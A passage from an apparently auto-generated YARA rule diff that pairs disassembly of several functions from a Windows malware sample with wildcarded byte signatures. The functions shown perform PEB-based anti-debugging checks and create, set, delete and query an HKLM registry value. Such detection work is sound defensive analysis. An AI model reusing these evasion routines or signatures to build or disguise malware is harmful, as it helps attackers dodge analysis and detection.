edi,dword [ebp + 20] + .text:0x00401325 8b55fc mov edx,dword [ebp - 4] + .text:0x00401328 83c9ff or ecx,0xffffffff + .text:0x0040132b 33c0 xor eax,eax + .text:0x0040132d f2ae repnz: scasb + .text:0x0040132f f7d1 not ecx + .text:0x00401331 2bf9 sub edi,ecx + .text:0x00401333 8bf7 mov esi,edi + 
.text:0x00401335 8bc1 mov eax,ecx + .text:0x00401337 8bfa mov edi,edx + .text:0x00401339 c1e902 shr ecx,2 + .text:0x0040133c f3a5 rep: movsd + .text:0x0040133e 8bc8 mov ecx,eax + .text:0x00401340 83e103 and ecx,3 + .text:0x00401343 f3a4 rep: movsb + .text:0x00401345 8b7d14 mov edi,dword [ebp + 20] + .text:0x00401348 83c9ff or ecx,0xffffffff + .text:0x0040134b 33c0 xor eax,eax + .text:0x0040134d f2ae repnz: scasb + .text:0x0040134f f7d1 not ecx + .text:0x00401351 83c1ff add ecx,0xffffffff + .text:0x00401354 8b55fc mov edx,dword [ebp - 4] + .text:0x00401357 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040135b 8945fc mov dword [ebp - 4],eax + .text:0x0040135e 6a00 push 0 + .text:0x00401360 8d8df4efffff lea ecx,dword [ebp - 4108] + .text:0x00401366 51 push ecx + .text:0x00401367 6a00 push 0 + .text:0x00401369 683f000f00 push 0x000f003f + .text:0x0040136e 6a00 push 0 + .text:0x00401370 6a00 push 0 + .text:0x00401372 6a00 push 0 + .text:0x00401374 6858c04000 push 0x0040c058 + .text:0x00401379 6802000080 push 0x80000002 + .text:0x0040137e ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c058,0,0,0,0x000f003f,0,local4112,0) + .text:0x00401384 85c0 test eax,eax + .text:0x00401386 7407 jz 0x0040138f + .text:0x00401388 b801000000 mov eax,1 + .text:0x0040138d eb49 jmp 0x004013d8 + .text:0x0040138f loc_0040138f: [1 XREFS] + .text:0x0040138f 6800100000 push 0x00001000 + .text:0x00401394 8d95f8efffff lea edx,dword [ebp - 4104] + .text:0x0040139a 52 push edx + .text:0x0040139b 6a03 push 3 + .text:0x0040139d 6a00 push 0 + .text:0x0040139f 6848c04000 push 0x0040c048 + .text:0x004013a4 8b85f4efffff mov eax,dword [ebp - 4108] + .text:0x004013aa 50 push eax + .text:0x004013ab ff151cb04000 call dword [0x0040b01c] ;advapi32.RegSetValueExA(0xfefefefe,0x0040c048,0,3,local4108,0x00001000) + .text:0x004013b1 85c0 test eax,eax + .text:0x004013b3 7414 jz 0x004013c9 + .text:0x004013b5 8b8df4efffff mov ecx,dword [ebp - 4108] + .text:0x004013bb 51 push ecx + 
.text:0x004013bc ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004013c2 b801000000 mov eax,1 + .text:0x004013c7 eb0f jmp 0x004013d8 + .text:0x004013c9 loc_004013c9: [1 XREFS] + .text:0x004013c9 8b95f4efffff mov edx,dword [ebp - 4108] + .text:0x004013cf 52 push edx + .text:0x004013d0 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004013d6 33c0 xor eax,eax + .text:0x004013d8 loc_004013d8: [2 XREFS] + .text:0x004013d8 5f pop edi + .text:0x004013d9 5e pop esi + .text:0x004013da 5b pop ebx + .text:0x004013db 8be5 mov esp,ebp + .text:0x004013dd 5d pop ebp + .text:0x004013de c3 ret + */ + $c23 = { 55 8B EC B8 18 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? B9 00 04 00 00 33 C0 8D BD ?? ?? ?? ?? F3 AB AA 8D 8D ?? ?? ?? ?? 89 4D ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 6A 00 8D 8D ?? ?? ?? ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 
B8 01 00 00 00 EB ?? 68 00 10 00 00 8D 95 ?? ?? ?? ?? 52 6A 03 6A 00 68 48 C0 40 00 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004013e0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - delete registry value + .text:0x004013e0 + .text:0x004013e0 FUNC: int cdecl sub_004013e0( ) [2 XREFS] + .text:0x004013e0 + .text:0x004013e0 Stack Variables: (offset from initial top of stack) + .text:0x004013e0 -8: int local8 + .text:0x004013e0 -12: int local12 + .text:0x004013e0 -16: int local16 + .text:0x004013e0 -20: int local20 + .text:0x004013e0 -24: int local24 + .text:0x004013e0 + .text:0x004013e0 55 push ebp + .text:0x004013e1 8bec mov ebp,esp + .text:0x004013e3 83ec14 sub esp,20 + .text:0x004013e6 53 push ebx + .text:0x004013e7 56 push esi + .text:0x004013e8 57 push edi + .text:0x004013e9 c745f000000000 mov dword [ebp - 16],0 + .text:0x004013f0 c745ec00000000 mov dword [ebp - 20],0 + .text:0x004013f7 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004013fd 8a5802 mov bl,byte [eax + 2] + .text:0x00401400 885df4 mov byte [ebp - 12],bl + .text:0x00401403 0fbe45f4 movsx eax,byte [ebp - 12] + .text:0x00401407 85c0 test eax,eax + .text:0x00401409 7405 jz 0x00401410 + .text:0x0040140b e8f0fbffff call 0x00401000 ;sub_00401000() + .text:0x00401410 loc_00401410: [1 XREFS] + .text:0x00401410 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401416 8b4018 mov eax,dword [eax + 24] + .text:0x00401419 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040141d 8945f0 mov dword [ebp - 16],eax + .text:0x00401420 837df000 cmp dword [ebp - 16],0 + .text:0x00401424 7405 jz 0x0040142b + .text:0x00401426 e8d5fbffff call 0x00401000 ;sub_00401000() + .text:0x0040142b loc_0040142b: [1 XREFS] + .text:0x0040142b 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401431 3e8b4068 ds: mov 
eax,dword [eax + 104] + .text:0x00401435 83e870 sub eax,112 + .text:0x00401438 8945ec mov dword [ebp - 20],eax + .text:0x0040143b 837dec00 cmp dword [ebp - 20],0 + .text:0x0040143f 7505 jnz 0x00401446 + .text:0x00401441 e8bafbffff call 0x00401000 ;sub_00401000() + .text:0x00401446 loc_00401446: [1 XREFS] + .text:0x00401446 6a00 push 0 + .text:0x00401448 8d4df8 lea ecx,dword [ebp - 8] + .text:0x0040144b 51 push ecx + .text:0x0040144c 6a00 push 0 + .text:0x0040144e 683f000f00 push 0x000f003f + .text:0x00401453 6a00 push 0 + .text:0x00401455 6a00 push 0 + .text:0x00401457 6a00 push 0 + .text:0x00401459 6858c04000 push 0x0040c058 + .text:0x0040145e 6802000080 push 0x80000002 + .text:0x00401463 ff1518b04000 call dword [0x0040b018] ;advapi32.RegCreateKeyExA(0x80000002,0x0040c058,0,0,0,0x000f003f,0,local12,0) + .text:0x00401469 85c0 test eax,eax + .text:0x0040146b 7407 jz 0x00401474 + .text:0x0040146d b801000000 mov eax,1 + .text:0x00401472 eb35 jmp 0x004014a9 + .text:0x00401474 loc_00401474: [1 XREFS] + .text:0x00401474 6848c04000 push 0x0040c048 + .text:0x00401479 8b55f8 mov edx,dword [ebp - 8] + .text:0x0040147c 52 push edx + .text:0x0040147d ff1514b04000 call dword [0x0040b014] ;advapi32.RegDeleteValueA(0xfefefefe,0x0040c048) + .text:0x00401483 8945fc mov dword [ebp - 4],eax + .text:0x00401486 837dfc00 cmp dword [ebp - 4],0 + .text:0x0040148a 7411 jz 0x0040149d + .text:0x0040148c 8b45f8 mov eax,dword [ebp - 8] + .text:0x0040148f 50 push eax + .text:0x00401490 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x00401496 b801000000 mov eax,1 + .text:0x0040149b eb0c jmp 0x004014a9 + .text:0x0040149d loc_0040149d: [1 XREFS] + .text:0x0040149d 8b4df8 mov ecx,dword [ebp - 8] + .text:0x004014a0 51 push ecx + .text:0x004014a1 ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004014a7 33c0 xor eax,eax + .text:0x004014a9 loc_004014a9: [2 XREFS] + .text:0x004014a9 5f pop edi + .text:0x004014aa 5e pop esi + 
.text:0x004014ab 5b pop ebx + .text:0x004014ac 8be5 mov esp,ebp + .text:0x004014ae 5d pop ebp + .text:0x004014af c3 ret + */ + $c24 = { 55 8B EC 83 EC 14 53 56 57 C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 5D ?? 0F BE 45 ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 45 ?? 83 7D ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 45 ?? 83 7D ?? 00 75 ?? E8 ?? ?? ?? ?? 6A 00 8D 4D ?? 51 6A 00 68 3F 00 0F 00 6A 00 6A 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 48 C0 40 00 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? 00 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004014b0@7faafc7e4a5c736ebfee6abbbc812d80 with 2 features: + - check for PEB NtGlobalFlag flag + - query or enumerate registry value + .text:0x004014b0 + .text:0x004014b0 FUNC: int cdecl sub_004014b0( int arg0, int arg1, int arg2, int arg3, int arg4, int arg5, int arg6, ) [8 XREFS] + .text:0x004014b0 + .text:0x004014b0 Stack Variables: (offset from initial top of stack) + .text:0x004014b0 28: int arg6 + .text:0x004014b0 24: int arg5 + .text:0x004014b0 20: int arg4 + .text:0x004014b0 16: int arg3 + .text:0x004014b0 12: int arg2 + .text:0x004014b0 8: int arg1 + .text:0x004014b0 4: int arg0 + .text:0x004014b0 -8: int local8 + .text:0x004014b0 -12: int local12 + .text:0x004014b0 -4108: int local4108 + .text:0x004014b0 -4112: int local4112 + .text:0x004014b0 -4116: int local4116 + .text:0x004014b0 -4120: int local4120 + .text:0x004014b0 -4124: int local4124 + .text:0x004014b0 -4128: int local4128 + .text:0x004014b0 + .text:0x004014b0 55 push ebp + .text:0x004014b1 8bec mov ebp,esp + .text:0x004014b3 b81c100000 mov eax,0x0000101c + .text:0x004014b8 e8b3240000 call 0x00403970 ;__alloca_probe() + .text:0x004014bd 53 push ebx + .text:0x004014be 56 push esi + .text:0x004014bf 57 push edi + .text:0x004014c0 
c785e8efffff0000 mov dword [ebp - 4120],0 + .text:0x004014ca c785e4efffff0000 mov dword [ebp - 4124],0 + .text:0x004014d4 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014da 8a5802 mov bl,byte [eax + 2] + .text:0x004014dd 889decefffff mov byte [ebp - 4116],bl + .text:0x004014e3 0fbe85ecefffff movsx eax,byte [ebp - 4116] + .text:0x004014ea 85c0 test eax,eax + .text:0x004014ec 7405 jz 0x004014f3 + .text:0x004014ee e80dfbffff call 0x00401000 ;sub_00401000() + .text:0x004014f3 loc_004014f3: [1 XREFS] + .text:0x004014f3 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004014f9 8b4018 mov eax,dword [eax + 24] + .text:0x004014fc 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00401500 8985e8efffff mov dword [ebp - 4120],eax + .text:0x00401506 83bde8efffff00 cmp dword [ebp - 4120],0 + .text:0x0040150d 7405 jz 0x00401514 + .text:0x0040150f e8ecfaffff call 0x00401000 ;sub_00401000() + .text:0x00401514 loc_00401514: [1 XREFS] + .text:0x00401514 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040151a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040151e 83e870 sub eax,112 + .text:0x00401521 8985e4efffff mov dword [ebp - 4124],eax + .text:0x00401527 83bde4efffff00 cmp dword [ebp - 4124],0 + .text:0x0040152e 7505 jnz 0x00401535 + .text:0x00401530 e8cbfaffff call 0x00401000 ;sub_00401000() + .text:0x00401535 loc_00401535: [1 XREFS] + .text:0x00401535 c745f801100000 mov dword [ebp - 8],0x00001001 + .text:0x0040153c 8d8df0efffff lea ecx,dword [ebp - 4112] + .text:0x00401542 51 push ecx + .text:0x00401543 683f000f00 push 0x000f003f + .text:0x00401548 6a00 push 0 + .text:0x0040154a 6858c04000 push 0x0040c058 + .text:0x0040154f 6802000080 push 0x80000002 + .text:0x00401554 ff1520b04000 call dword [0x0040b020] ;advapi32.RegOpenKeyExA(0x80000002,0x0040c058,0,0x000f003f,local4116) + .text:0x0040155a 85c0 test eax,eax + .text:0x0040155c 740a jz 0x00401568 + .text:0x0040155e b801000000 mov eax,1 + .text:0x00401563 e94f010000 jmp 0x004016b7 + .text:0x00401568 
loc_00401568: [1 XREFS] + .text:0x00401568 8d55f8 lea edx,dword [ebp - 8] + .text:0x0040156b 52 push edx + .text:0x0040156c 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x00401572 50 push eax + .text:0x00401573 6a00 push 0 + .text:0x00401575 6a00 push 0 + .text:0x00401577 6848c04000 push 0x0040c048 + .text:0x0040157c 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x00401582 51 push ecx + .text:0x00401583 ff1524b04000 call dword [0x0040b024] ;advapi32.RegQueryValueExA(0xfefefefe,0x0040c048,0,0,local4108,local12) + .text:0x00401589 8985f4efffff mov dword [ebp - 4108],eax + .text:0x0040158f 83bdf4efffff00 cmp dword [ebp - 4108],0 + .text:0x00401596 7417 jz 0x004015af + .text:0x00401598 8b95f0efffff mov edx,dword [ebp - 4112] + .text:0x0040159e 52 push edx + .text:0x0040159f ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004015a5 b801000000 mov eax,1 + .text:0x004015aa e908010000 jmp 0x004016b7 + .text:0x004015af loc_004015af: [1 XREFS] + .text:0x004015af 8d85f8efffff lea eax,dword [ebp - 4104] + .text:0x004015b5 8945fc mov dword [ebp - 4],eax + .text:0x004015b8 8b7dfc mov edi,dword [ebp - 4] + .text:0x004015bb 8b5508 mov edx,dword [ebp + 8] + .text:0x004015be 83c9ff or ecx,0xffffffff + .text:0x004015c1 33c0 xor eax,eax + .text:0x004015c3 f2ae repnz: scasb + .text:0x004015c5 f7d1 not ecx + .text:0x004015c7 2bf9 sub edi,ecx + .text:0x004015c9 8bf7 mov esi,edi + .text:0x004015cb 8bc1 mov eax,ecx + .text:0x004015cd 8bfa mov edi,edx + .text:0x004015cf c1e902 shr ecx,2 + .text:0x004015d2 f3a5 rep: movsd + .text:0x004015d4 8bc8 mov ecx,eax + .text:0x004015d6 83e103 and ecx,3 + .text:0x004015d9 f3a4 rep: movsb + .text:0x004015db 8b7d08 mov edi,dword [ebp + 8] + .text:0x004015de 83c9ff or ecx,0xffffffff + .text:0x004015e1 33c0 xor eax,eax + .text:0x004015e3 f2ae repnz: scasb + .text:0x004015e5 f7d1 not ecx + .text:0x004015e7 83c1ff add ecx,0xffffffff + .text:0x004015ea 8b55fc mov edx,dword [ebp - 4] + .text:0x004015ed 8d440a01 lea 
eax,dword [edx + ecx + 1] + .text:0x004015f1 8945fc mov dword [ebp - 4],eax + .text:0x004015f4 8b7dfc mov edi,dword [ebp - 4] + .text:0x004015f7 8b5510 mov edx,dword [ebp + 16] + .text:0x004015fa 83c9ff or ecx,0xffffffff + .text:0x004015fd 33c0 xor eax,eax + .text:0x004015ff f2ae repnz: scasb + .text:0x00401601 f7d1 not ecx + .text:0x00401603 2bf9 sub edi,ecx + .text:0x00401605 8bf7 mov esi,edi + .text:0x00401607 8bc1 mov eax,ecx + .text:0x00401609 8bfa mov edi,edx + .text:0x0040160b c1e902 shr ecx,2 + .text:0x0040160e f3a5 rep: movsd + .text:0x00401610 8bc8 mov ecx,eax + .text:0x00401612 83e103 and ecx,3 + .text:0x00401615 f3a4 rep: movsb + .text:0x00401617 8b7d10 mov edi,dword [ebp + 16] + .text:0x0040161a 83c9ff or ecx,0xffffffff + .text:0x0040161d 33c0 xor eax,eax + .text:0x0040161f f2ae repnz: scasb + .text:0x00401621 f7d1 not ecx + .text:0x00401623 83c1ff add ecx,0xffffffff + .text:0x00401626 8b55fc mov edx,dword [ebp - 4] + .text:0x00401629 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x0040162d 8945fc mov dword [ebp - 4],eax + .text:0x00401630 8b7dfc mov edi,dword [ebp - 4] + .text:0x00401633 8b5518 mov edx,dword [ebp + 24] + .text:0x00401636 83c9ff or ecx,0xffffffff + .text:0x00401639 33c0 xor eax,eax + .text:0x0040163b f2ae repnz: scasb + .text:0x0040163d f7d1 not ecx + .text:0x0040163f 2bf9 sub edi,ecx + .text:0x00401641 8bf7 mov esi,edi + .text:0x00401643 8bc1 mov eax,ecx + .text:0x00401645 8bfa mov edi,edx + .text:0x00401647 c1e902 shr ecx,2 + .text:0x0040164a f3a5 rep: movsd + .text:0x0040164c 8bc8 mov ecx,eax + .text:0x0040164e 83e103 and ecx,3 + .text:0x00401651 f3a4 rep: movsb + .text:0x00401653 8b7d18 mov edi,dword [ebp + 24] + .text:0x00401656 83c9ff or ecx,0xffffffff + .text:0x00401659 33c0 xor eax,eax + .text:0x0040165b f2ae repnz: scasb + .text:0x0040165d f7d1 not ecx + .text:0x0040165f 83c1ff add ecx,0xffffffff + .text:0x00401662 8b55fc mov edx,dword [ebp - 4] + .text:0x00401665 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x00401669 
8945fc mov dword [ebp - 4],eax + .text:0x0040166c 8b7dfc mov edi,dword [ebp - 4] + .text:0x0040166f 8b5520 mov edx,dword [ebp + 32] + .text:0x00401672 83c9ff or ecx,0xffffffff + .text:0x00401675 33c0 xor eax,eax + .text:0x00401677 f2ae repnz: scasb + .text:0x00401679 f7d1 not ecx + .text:0x0040167b 2bf9 sub edi,ecx + .text:0x0040167d 8bf7 mov esi,edi + .text:0x0040167f 8bc1 mov eax,ecx + .text:0x00401681 8bfa mov edi,edx + .text:0x00401683 c1e902 shr ecx,2 + .text:0x00401686 f3a5 rep: movsd + .text:0x00401688 8bc8 mov ecx,eax + .text:0x0040168a 83e103 and ecx,3 + .text:0x0040168d f3a4 rep: movsb + .text:0x0040168f 8b7d20 mov edi,dword [ebp + 32] + .text:0x00401692 83c9ff or ecx,0xffffffff + .text:0x00401695 33c0 xor eax,eax + .text:0x00401697 f2ae repnz: scasb + .text:0x00401699 f7d1 not ecx + .text:0x0040169b 83c1ff add ecx,0xffffffff + .text:0x0040169e 8b55fc mov edx,dword [ebp - 4] + .text:0x004016a1 8d440a01 lea eax,dword [edx + ecx + 1] + .text:0x004016a5 8945fc mov dword [ebp - 4],eax + .text:0x004016a8 8b8df0efffff mov ecx,dword [ebp - 4112] + .text:0x004016ae 51 push ecx + .text:0x004016af ff1558b04000 call dword [0x0040b058] ;kernel32.CloseHandle(0xfefefefe) + .text:0x004016b5 33c0 xor eax,eax + .text:0x004016b7 loc_004016b7: [2 XREFS] + .text:0x004016b7 5f pop edi + .text:0x004016b8 5e pop esi + .text:0x004016b9 5b pop ebx + .text:0x004016ba 8be5 mov esp,ebp + .text:0x004016bc 5d pop ebp + .text:0x004016bd c3 ret + */ + $c25 = { 55 8B EC B8 1C 10 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? C7 45 ?? 01 10 00 00 8D 8D ?? ?? ?? ?? 51 68 3F 00 0F 00 6A 00 68 58 C0 40 00 68 02 00 00 80 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 
B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 6A 00 6A 00 68 48 C0 40 00 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 7D ?? 8B 55 ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8B 7D ?? 83 C9 FF 33 C0 F2 AE F7 D1 83 C1 FF 8B 55 ?? 8D 44 0A ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004016c0@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x004016c0 + .text:0x004016c0 FUNC: int cdecl sub_004016c0( int arg0, int arg1, ) [2 XREFS] + .text:0x004016c0 + .text:0x004016c0 Stack Variables: (offset from initial top of stack) + .text:0x004016c0 8: int arg1 + .text:0x004016c0 4: int arg0 + .text:0x004016c0 -1028: int local1028 + .text:0x004016c0 -2052: int local2052 + .text:0x004016c0 -3076: int local3076 + .text:0x004016c0 -3080: int local3080 + .text:0x004016c0 -3084: int local3084 + .text:0x004016c0 -3088: int local3088 + .text:0x004016c0 + .text:0x004016c0 55 push ebp + .text:0x004016c1 8bec mov ebp,esp + .text:0x004016c3 81ec0c0c0000 sub esp,3084 + .text:0x004016c9 53 push ebx + .text:0x004016ca 56 push esi + .text:0x004016cb 57 push edi + .text:0x004016cc c785f8f3ffff0000 mov dword [ebp - 3080],0 + .text:0x004016d6 c785f4f3ffff0000 mov dword [ebp - 3084],0 + .text:0x004016e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004016e6 8a5802 mov bl,byte [eax + 2] + .text:0x004016e9 889dfcf3ffff mov byte [ebp - 3076],bl + .text:0x004016ef 0fbe85fcf3ffff movsx eax,byte [ebp - 3076] + .text:0x004016f6 85c0 test eax,eax + .text:0x004016f8 7405 jz 0x004016ff + .text:0x004016fa e801f9ffff call 0x00401000 ;sub_00401000() + .text:0x004016ff loc_004016ff: [1 XREFS] + .text:0x004016ff 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401705 8b4018 mov eax,dword [eax + 24] + .text:0x00401708 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040170c 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00401712 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x00401719 7405 jz 0x00401720 + .text:0x0040171b e8e0f8ffff call 0x00401000 ;sub_00401000() + .text:0x00401720 loc_00401720: [1 XREFS] + .text:0x00401720 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00401726 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040172a 83e870 sub eax,112 + 
.text:0x0040172d 8985f4f3ffff mov dword [ebp - 3084],eax + .text:0x00401733 83bdf4f3ffff00 cmp dword [ebp - 3084],0 + .text:0x0040173a 7505 jnz 0x00401741 + .text:0x0040173c e8bff8ffff call 0x00401000 ;sub_00401000() + .text:0x00401741 loc_00401741: [1 XREFS] + .text:0x00401741 6800040000 push 1024 + .text:0x00401746 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x0040174c 51 push ecx + .text:0x0040174d 6800040000 push 1024 + .text:0x00401752 8d9500f4ffff lea edx,dword [ebp - 3072] + .text:0x00401758 52 push edx + .text:0x00401759 8b450c mov eax,dword [ebp + 12] + .text:0x0040175c 50 push eax + .text:0x0040175d 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00401760 51 push ecx + .text:0x00401761 6800040000 push 1024 + .text:0x00401766 8d9500f8ffff lea edx,dword [ebp - 2048] + .text:0x0040176c 52 push edx + .text:0x0040176d e83efdffff call 0x004014b0 ;sub_004014b0(local2052,1024,arg0,arg1,local3076,1024,local1028) + .text:0x00401772 83c420 add esp,32 + .text:0x00401775 85c0 test eax,eax + .text:0x00401777 7407 jz 0x00401780 + .text:0x00401779 b801000000 mov eax,1 + .text:0x0040177e eb02 jmp 0x00401782 + .text:0x00401780 loc_00401780: [1 XREFS] + .text:0x00401780 33c0 xor eax,eax + .text:0x00401782 loc_00401782: [1 XREFS] + .text:0x00401782 5f pop edi + .text:0x00401783 5e pop esi + .text:0x00401784 5b pop ebx + .text:0x00401785 8be5 mov esp,ebp + .text:0x00401787 5d pop ebp + .text:0x00401788 c3 ret + */ + $c26 = { 55 8B EC 81 EC 0C 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 20 85 C0 74 ?? 
